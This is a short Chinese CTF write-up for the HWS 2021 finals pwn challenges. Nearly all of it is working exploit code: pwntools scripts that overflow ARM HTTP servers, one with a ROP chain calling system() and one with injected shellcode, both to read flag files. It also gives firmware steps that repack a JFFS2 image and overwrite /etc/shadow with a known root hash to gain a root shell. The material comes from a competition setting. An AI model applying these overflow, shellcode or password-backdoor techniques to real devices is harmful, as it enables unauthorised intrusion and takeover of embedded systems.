HWS 2021 结营赛 Pwn

更新中…结营赛还有非常多值得探索的东西

Pwn1: easyserver

串口看输出

from pwn import *
#context.log_level = 'debug'

p = remote('20.21.2.27', 59816)

pop_r0_pc = 0x0006099c
cmd_base = 0x008ACE4
system = 0x00019158

cmd = 'cat /tmp/207775d1ee9b9efa245fd9fb6fc03b68/flag'
payload  = 'POST ./ HTTP1.1;'+cmd+'; \r\n'
payload += 'a'*1100+p32(pop_r0_pc)+ p32(cmd_base+13) + p32(system) +cyclic(100)+'\r\n'+'\r\n'+'\r\n'
print payload

p.send(payload)
p.interactive()

image

Pwn3: babyhttpd

串口看输出

from pwn import *
#context.log_level = 'debug'
context(arch='arm')

# shellcode  = asm('''
# add   r4, pc, #56
# str   r4, [sp, #8]
# sub   r2, r2, r2 
# strb  r2, [r4, #4] 

# sub   r2, r2, r2       
# add   r3, pc, #28      
# str   r3, [sp, #4]     
# str   r2, [sp, #12]     
# mov   r0, r3, lsl r2   
# strb  r2, [r3, #7]     
# add   r3, pc, #4       
# add   r1, sp, #4       
# strb  r2, [r3, #1]     
# swi   0x90ff0b         
# ''')+'/bin/ls//tmp'


shellcode  = asm('''
add   r4, pc, #60
str   r4, [sp, #8]
sub   r2, r2, r2 
strb  r2, [r4, #25] 

sub   r2, r2, r2       
add   r3, pc, #28      
str   r3, [sp, #4]     
str   r2, [sp, #12]     
mov   r0, r3, lsl r2   
strb  r2, [r3, #8]     
add   r3, pc, #4       
add   r1, sp, #4       
strb  r2, [r3, #1]     
swi   0x90ff0b         
''')+'/bin/cat/////tmp/ffffffllllaaaaaagggg'

p = remote('20.21.2.27', 5000)

payload  = 'POST /'+"\x11"*6+shellcode+'\r\n\r\n'
payload += 'name='+'a'*655+p32(0x22504)+'&bbb=./;'

p.send(payload)
p.interactive()

image

板子拿shell

jffs2解包

# Install jefferson to extract JFFS2 file systems
$ sudo pip install cstruct
$ git clone https://github.com/sviehb/jefferson
$ (cd jefferson && sudo python setup.py install)
binwalk -Me test.img

jffs2打包

sudo apt install mtd-utils
mkfs.jffs2 -r rootfs -o rootfs.img 

修改start.sh

#!/bin/sh
cp -r /etc /tmp/
echo 'root:$1$NqxdI63c$nzvMkcJxzktGW6Tsgw3jb0:1::::::' > /tmp/etc/shadow
mount -o loop /tmp/etc/ /etc